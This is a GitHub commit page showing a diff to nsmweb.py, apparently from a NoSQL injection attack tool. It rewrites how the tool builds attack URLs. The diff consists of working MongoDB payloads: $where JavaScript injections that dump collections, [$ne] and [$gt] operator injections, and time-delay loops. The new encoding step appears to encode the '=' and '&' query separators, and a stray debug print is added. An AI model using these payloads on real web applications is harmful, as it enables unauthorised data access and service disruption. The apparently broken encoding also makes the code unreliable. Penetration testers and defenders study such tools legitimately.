Skip to content

Commit d06f69b

Browse files
codingocodingo
authored
Merge pull request #60 from SudhanshuC/master
Update nsmweb.py
2 parents 98021fc + 6c9fbe9 commit d06f69b

File tree

1 file changed

+19
-35
lines changed

1 file changed

+19
-35
lines changed

nsmweb.py

+19-35
Original file line numberDiff line numberDiff line change
@@ -133,6 +133,7 @@ def getApps(webPort,victim,uri,https,verb,requestHeaders):
133133
else:
134134
print "Test 2: $where injection (string escape)"
135135

136+
print uriArray[2]
136137
req = urllib2.Request(uriArray[2], None, requestHeaders)
137138
errorCheck = errorTest(str(urllib2.urlopen(req).read()),testNum)
138139

@@ -890,49 +891,31 @@ def buildUri(origUri, randValue):
890891
return
891892

892893
x = 0
893-
uriArray[0] = split_uri[0] + "?"
894-
uriArray[1] = split_uri[0] + "?"
895-
uriArray[2] = split_uri[0] + "?"
896-
uriArray[3] = split_uri[0] + "?"
897-
uriArray[4] = split_uri[0] + "?"
898-
uriArray[5] = split_uri[0] + "?"
899-
uriArray[6] = split_uri[0] + "?"
900-
uriArray[7] = split_uri[0] + "?"
901-
uriArray[8] = split_uri[0] + "?"
902-
uriArray[9] = split_uri[0] + "?"
903-
uriArray[10] = split_uri[0] + "?"
904-
uriArray[11] = split_uri[0] + "?"
905-
uriArray[12] = split_uri[0] + "?"
906-
uriArray[13] = split_uri[0] + "?"
907-
uriArray[14] = split_uri[0] + "?"
908-
uriArray[15] = split_uri[0] + "?"
909-
uriArray[16] = split_uri[0] + "?"
910-
uriArray[17] = split_uri[0] + "?"
911-
uriArray[18] = split_uri[0] + "?"
894+
912895

913896
for item in paramName:
914897

915898
if paramName[x] in injOpt:
916899
uriArray[0] += paramName[x] + "=" + randValue + "&"
917900
uriArray[1] += paramName[x] + "[$ne]=" + randValue + "&"
918-
uriArray[2] += paramName[x] + "=" + urllib.quote("a'; return db.a.find(); var dummy='!") + "&"
919-
uriArray[3] += paramName[x] + "=" + urllib.quote("1; return db.a.find(); var dummy=1") + "&"
920-
uriArray[4] += paramName[x] + "=" + urllib.quote("a'; return db.a.findOne(); var dummy='!") + "&"
921-
uriArray[5] += paramName[x] + "=" + urllib.quote("1; return db.a.findOne(); var dummy=1") + "&"
922-
uriArray[6] += paramName[x] + "=" + urllib.quote("a'; return this.a != '" + randValue + "'; var dummy='!") + "&"
923-
uriArray[7] += paramName[x] + "=" + urllib.quote("1; return this.a !=" + randValue + "; var dummy=1") + "&"
901+
uriArray[2] += paramName[x] + "=a'; return db.a.find(); var dummy='!" + "&"
902+
uriArray[3] += paramName[x] + "=1; return db.a.find(); var dummy=1" + "&"
903+
uriArray[4] += paramName[x] + "=a'; return db.a.findOne(); var dummy='!" + "&"
904+
uriArray[5] += paramName[x] + "=1; return db.a.findOne(); var dummy=1" + "&"
905+
uriArray[6] += paramName[x] + "=a'; return this.a != '" + randValue + "'; var dummy='!" + "&"
906+
uriArray[7] += paramName[x] + "=1; return this.a !=" + randValue + "; var dummy=1" + "&"
924907
uriArray[8] += paramName[x] + "[$gt]=&"
925-
uriArray[9] += paramName[x] + "=" + urllib.quote("1; var date = new Date(); var curDate = null; do { curDate = new Date(); } while((Math.abs(date.getTime()-curDate.getTime()))/1000 < 10); return; var dummy=1") + "&"
926-
uriArray[10] += paramName[x] + "=" + urllib.quote("a\"; return db.a.find(); var dummy='!") + "&"
927-
uriArray[11] += paramName[x] + "=" + urllib.quote("a\"; return this.a != '" + randValue + "'; var dummy='!") + "&"
928-
uriArray[12] += paramName[x] + "=" + urllib.quote("a\"; return db.a.findOne(); var dummy=\"!") + "&"
929-
uriArray[13] += paramName[x] + "=" + urllib.quote("a\"; var date = new Date(); var curDate = null; do { curDate = new Date(); } while((Math.abs(date.getTime()-curDate.getTime()))/1000 < 10); return; var dummy=\"!") + "&"
930-
uriArray[14] += paramName[x] + urllib.quote("a'; return true; var dum='a")
908+
uriArray[9] += paramName[x] + "=1; var date = new Date(); var curDate = null; do { curDate = new Date(); } while((Math.abs(date.getTime()-curDate.getTime()))/1000 < 10); return; var dummy=1" + "&"
909+
uriArray[10] += paramName[x] + "=a\"; return db.a.find(); var dummy='!" + "&"
910+
uriArray[11] += paramName[x] + "=a\"; return this.a != '" + randValue + "'; var dummy='!" + "&"
911+
uriArray[12] += paramName[x] + "=a\"; return db.a.findOne(); var dummy=\"!" + "&"
912+
uriArray[13] += paramName[x] + "=a\"; var date = new Date(); var curDate = null; do { curDate = new Date(); } while((Math.abs(date.getTime()-curDate.getTime()))/1000 < 10); return; var dummy=\"!" + "&"
913+
uriArray[14] += paramName[x] + "a'; return true; var dum='a"
931914
uriArray[15] += paramName[x] + "1; return true; var dum=2"
932915
#Add values that can be manipulated for database attacks
933-
uriArray[16] += paramName[x] + "=" + urllib.quote("a\'; ---")
916+
uriArray[16] += paramName[x] + "=a\'; ---"
934917
uriArray[17] += paramName[x] + "=1; if ---"
935-
uriArray[18] += paramName[x] + "=" + urllib.quote("a'; var date = new Date(); var curDate = null; do { curDate = new Date(); } while((Math.abs(date.getTime()-curDate.getTime()))/1000 < 10); return; var dummy='!") + "&"
918+
uriArray[18] += paramName[x] + "=a'; var date = new Date(); var curDate = null; do { curDate = new Date(); } while((Math.abs(date.getTime()-curDate.getTime()))/1000 < 10); return; var dummy='!" + "&"
936919

937920
else:
938921
uriArray[0] += paramName[x] + "=" + paramValue[x] + "&"
@@ -959,7 +942,9 @@ def buildUri(origUri, randValue):
959942
#Clip the extra & off the end of the URL
960943
x = 0
961944
while x <= 18:
962-
uriArray[x]= uriArray[x][:-1]
945+
# uriArray[x]= uriArray[x][:-1]
946+
uriArray[x]=split_uri[0]+"?"+urllib.quote_plus(uriArray[x][:-1])
947+
963948
x += 1
964949

965950
return uriArray[0]
@@ -1193,4 +1178,3 @@ def getDBInfo():
11931178
crackHash = raw_input("Crack another hash (y/n)?")
11941179
raw_input("Press enter to continue...")
11951180
return
1196-

0 commit comments

Comments
 (0)